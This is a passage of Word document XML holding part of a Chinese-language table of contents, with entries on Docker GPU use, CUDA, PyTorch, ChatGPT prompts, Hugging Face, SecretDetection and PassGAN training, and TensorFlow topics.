              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780214 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>857</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F5AEBD0" w14:textId="44F18FF8" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780215" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>如何调用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>卡的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>GPU</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780215 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>859</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E1583DF" w14:textId="34757678" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780216" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>下载</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CUDA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780216 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>859</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A70DED8" w14:textId="15666215" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780217" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>torch+cuDNN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780217 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>860</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="572206B1" w14:textId="71D4813D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780218" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>chatGPT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780218 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>862</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F67A8D0" w14:textId="6B1CCC5B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780219" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>prompt</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>训练</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780219 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>863</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56C41EB5" w14:textId="5073CB25" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780220" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hugging Face</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780220 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>863</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3CDAFC37" w14:textId="2069B3C7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780221" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SecretDetection</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>训练</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780221 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>864</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="380AAA7D" w14:textId="72D78360" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780222" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>训练数据</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780222 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>864</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C3B5574" w14:textId="6D37678A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780223" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PassGAN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780223 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>865</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B4A0706" w14:textId="113243B3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780224" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>tensorflow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780224 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>865</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41FC60C0" w14:textId="123F287B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780225" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">AVX2 </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> FMA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780225 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>867</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A186AFD" w14:textId="5DEE367B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780226" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>（一）</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>tf.keras</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780226 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>867</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65CD1917" w14:textId="0546C113" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780227" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>（二）</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Eager</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>模式与自定义训练</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780227 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>867</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08487581" w14:textId="01A58938" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780228" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>（三）</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>tf.data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780228 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>868</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5ED089C9" w14:textId="3671BE94" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780229" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>（四）介绍</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>tf.function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780229 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>868</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0142DF81" w14:textId="62A0BC06" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780230" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>（五）卷积神经网络</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780230 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>868</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D851886" w14:textId="1834B009" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780231" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>（六）多输出卷积神经网络综合实例</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
